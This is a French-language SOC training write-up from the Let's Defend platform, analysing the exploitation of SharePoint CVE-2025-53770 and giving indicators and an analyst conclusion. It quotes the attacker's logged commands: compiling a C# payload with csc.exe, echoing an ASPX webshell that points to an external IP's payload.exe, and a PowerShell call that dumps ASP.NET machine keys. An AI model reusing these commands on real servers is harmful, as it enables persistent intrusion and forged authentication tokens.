Une activité pour entraîner les compétences d'analyse et de reporting
Ceci est une investigation menée sur la plateforme Let's Defend, basée sur une récente CVE SharePoint. Jetons un coup d'œil.
La règle SOC342 a détecté une requête POST non authentifiée ciblant la page vulnérable ToolPane.aspx, comprenant :
Un utilisateur externe (IP: 107.191.58.76) a envoyé une requête forgée à un serveur SharePoint interne (172.16.20.17).
Analysez le journal de notre endpoint
Un processus w3wp.exe exécutant une commande PowerShell encodée peut indiquer une exploitation potentielle ou une activité de post-exploitation (par exemple, exécution d'une charge utile cachée).
Dans un environnement SharePoint, il est important de vérifier si ce comportement est attendu ou s'il représente un abus.
La commande a été obscurcie à l'aide de base64
Cette charge utile permet à l'attaquant d'extraire et d'afficher les clés de configuration ASP.NET critiques de la machine sur laquelle elle s'exécute.
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs
"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
Compile un exécutable à partir du code source C# sur le serveur.
Crée une porte dérobée web (fichier ASPX malveillant) dans le chemin SharePoint, qui, lorsqu'il est visité, permet l'exécution ou le téléchargement d'une charge utile externe.
cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
Cette commande crée un fichier nommé spinstall0.aspx dans le dossier LAYOUTS de SharePoint et y écrit le contenu (ici est un espace réservé représentant le code d'un webshell)
Voici le hash de spinstall0.apx 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514
Jetons un coup d'œil sur virustotal.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"
Cette commande permet à l'attaquant d'accéder à la configuration d'application de MachineKeySection, ce qui peut exposer des clés cryptographiques sensibles comme la clé de validation et la clé de déchiffrement.
Ces clés sont critiques pour la sécurité ASP.NET, protégeant des éléments comme les cookies d'authentification et ViewState.
L'exposition ou la récupération de ces clés peut permettre aux attaquants de forger des jetons d'authentification, de déchiffrer des données protégées ou d'effectuer d'autres attaques contre l'application web.
MITRE ATT&CK

Note de l'analyste :
L'alerte a été générée en raison d'une activité PowerShell inhabituelle observée sur un serveur SharePoint, déterminée par la suite comme une tentative d'exploitation ciblant CVE-2025-53770. L'attaquant a d'abord déposé et compilé un exécutable C# personnalisé (payload.exe) à l'aide du compilateur C# (csc.exe), puis a créé un webshell ASPX malveillant (spinstall0.aspx) dans un répertoire SharePoint accessible via le web. Ensuite, une commande PowerShell a été exécutée pour récupérer des clés cryptographiques sensibles de la machine depuis la configuration du serveur via la réflexion .NET. Cette séquence d'actions suggère une attaque en plusieurs phases conçue pour maintenir un contrôle persistant et éventuellement forger des jetons d'authentification. Le webshell a été vérifié comme malveillant avec un ratio de détection VirusTotal de 39/62. L'incident est confirmé comme un vrai positif, et des mesures supplémentaires de confinement et de remédiation sont recommandées.

CVE-2025-53770 Detail
La désérialisation de données non fiables dans Microsoft SharePoint Server sur site permet à un attaquant non autorisé d'exécuter du code sur un réseau. Microsoft est conscient qu'un exploit pour CVE-2025-53770 existe dans la nature. Microsoft prépare et teste actuellement une mise à jour complète pour corriger cette vulnérabilité. En attendant, veuillez vous assurer que l'atténuation fournie dans cette documentation CVE est en place afin d'être protégé contre l'exploitation.

Atténuation suggérée par Microsoft : Pour atténuer les attaques potentielles, les clients doivent :
IoC
Spinstall0.aspx Web shell utilisé par les acteurs malveillants
Les acteurs ont également modifié le nom du fichier de diverses manières – comme spinstall.aspx, spinstall1.aspx, spinstall2.aspx
Ce rapport est basé sur une activité menée sur la plateforme Let's Defend. Toutes les découvertes et tous les documents présentés le sont à des fins éducatives uniquement. Tous les droits et la propriété appartiennent à Let's Defend.